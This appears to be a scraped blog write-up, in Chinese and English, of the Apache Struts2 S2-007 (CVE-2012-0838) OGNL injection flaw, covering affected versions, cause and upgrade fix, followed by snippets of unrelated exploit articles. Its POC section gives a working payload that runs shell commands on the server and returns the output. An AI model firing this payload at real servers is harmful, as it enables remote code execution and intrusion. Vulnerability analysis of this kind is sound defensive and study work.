struts2 CVE-2012-0838 S2-007 Remote Code Execution

catalog

1. Description
2. Effected Scope
3. Exploit Analysis
4. Principle Of Vulnerability
5. Patch Fix

1. Description

S2-007和S2-003、S2-005的漏洞源头都是一样的,都是struts2对OGNL的解析过程中存在漏洞,导致黑客可以通过OGNL表达式实现代码注入和执行,所不同的是

1. S2-003、S2-005: 通过OGNL的name-value的赋值解析过程、#访问全局静态变量(AOP思想)实现代码执行
2. S2-007: 通过OGNL中String向long转换过程实现代码执行
//即它们的攻击向量是不同的

User input is evaluated as an OGNL expression when there‘s a conversion error. This allows a malicious user to execute arbitrary code.
关于struts2 OGNL的相关知识,请参阅另一篇文章

http://www.cnblogs.com/LittleHann/p/4614488.html
//搜索:5. struts2 OGNL表达式

Relevant Link:

http://struts.apache.org/docs/s2-007.html
http://cve.scap.org.cn/CVE-2012-0838.html

2. Effected Scope

Struts 2.0.0 - Struts 2.2.3

3. Exploit Analysis

0x1: POC

id=‘%2b(%23_memberAccess.allowStaticMethodAccess=true,%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23cmd="ifconfig",%[email protected]@getRuntime().exec(%23cmd),%23data=new+java.io.DataInputStream(%23ret.getInputStream()),%23res=new+byte[500],%23data.readFully(%23res),%23echo=new+java.lang.String(%23res),%[email protected]@getResponse(),%23out.getWriter().println(%23echo))%2b‘

4. Principle Of Vulnerability

Apache Struts 2.2.3.1之前的2版本中存在漏洞,该漏洞源于在处理转换错误时评估字符串为OGNL表达式。远程攻击者可利用此漏洞借助无效的输入,修改run-time数据值,进而执行任意代码

5. Patch Fix

0x1: upgrade struts2

It is strongly recommended to upgrade to Struts 2.3.1.1, which contains the corrected classes.

Relevant Link:

Copyright (c) 2015 Little5ann All rights reserved

时间: 2024-08-29 04:39:31

struts2 CVE-2012-0838 S2-007 Remote Code Execution的相关文章

Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution

EDB-ID: 41929 Author: vportal Published: 2017-04-25 CVE: N/A Type: Remote Platform: Windows Aliases: ERRATICGOPHER Advisory/Source: N/A Tags: N/A E-DB Verified:  Exploit:  Download/ View Raw Vulnerable App: N/A #!/usr/bin/env python # -*- coding: utf

MS15-034 HTTP.sys (IIS) DoS And Possible Remote Code Execution – AGGIORNAMENTO CRITICO

Introduzione E’ stata rilevato un nuovo attacco tramite exploit verso il demone IIS (Internet Information Server) dei sistemi operativi Windows. In realtà la libreria vulnerabile si chiama  HTTP.sys che viene utilizzata maggiormente dal demone ISS, m

Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现

一.  Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现 漏洞描述: Home Web Server允许调用CGI程序来通过POST请求访问位于/cgi-bin下的文件,然后通过目录遍历,就有可能执行远程主机的任意可执行程序. 漏洞影响范围: Home Web Server 1.9.1 build 164 漏洞复现: 利用原理: NC连接发送打开计算器请求,安装Home Web Server 1.9.1 build 164

CVE-2010-0483分析 Microsoft Internet Explorer 6/7/8 - 'winhlp32.exe' 'MsgBox()' Remote Code Execution

相关资料:https://www.exploit-db.com/exploits/11615/ 目的是为了了解漏洞执行的流程. 根据资料准备服务端环境: 用一台win7当做是服务器,需要在win7上共享一个文件夹用于客户端访问.我的测试环境共享的文件夹是www. (1)启用Guest来宾账户,共享文件夹时将Guest添加读权限.此时在win7本机上应能访问,但在局域网的XP虚拟机无法访问  \\192.168.0.11\www\ (2)运行 secpol.msc 打开本地安全策略->本地策略->

MyBB <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) Vulnerability

catalogue 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 MyBB's unset_globals() function can be bypassed under special conditions and it is possible to allows remote code execution. Relevant Link: https://cxsecurity.com/issue/WLB-20151

Insecure default in Elasticsearch enables remote code execution

Elasticsearch has a flaw in its default configuration which makes it possible for any webpage to execute arbitrary code on visitors with Elasticsearch installed. If you're running Elasticsearch in development please read the instructions on how to se

Exploiting CVE-2015-2509 /MS15-100 : Windows Media Center could allow remote code execution

Exploiting CVE-2015-2509 /MS15-100 : Windows Media Center could allow remote code execution Trend Micro blog about itfew days ago.  This vulnerability is related to Hacking Team leaked email addresses . The issue is so trival that exploitation is a p

Discuz! X2.5 /source/class/helper/helper_seo.php Remote Code Execution Vul

catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 SEO模块中的preg_replace+修正符e+双引号引发的远程代码执行漏洞 Relevant Link: http://www.wooyun.org/bugs/wooyun-2012-06420 2. 漏洞触发条件 1. 后台设置,打开SEO扩展 2. 注册任意账户 3. 登陆用户,发表blog日志(注意是日志) 4. 添加图片,选择网络图片,地址{${

ElasticSearch Remote Code Execution (CVE-2014-3120)

Elasticsearch is a powerful open source search and analytics engine. The vulnerability allows attackers read from or append to files on the system hosting ElasticSearch database, could lead to sensitive information disclosure or further attack. Not s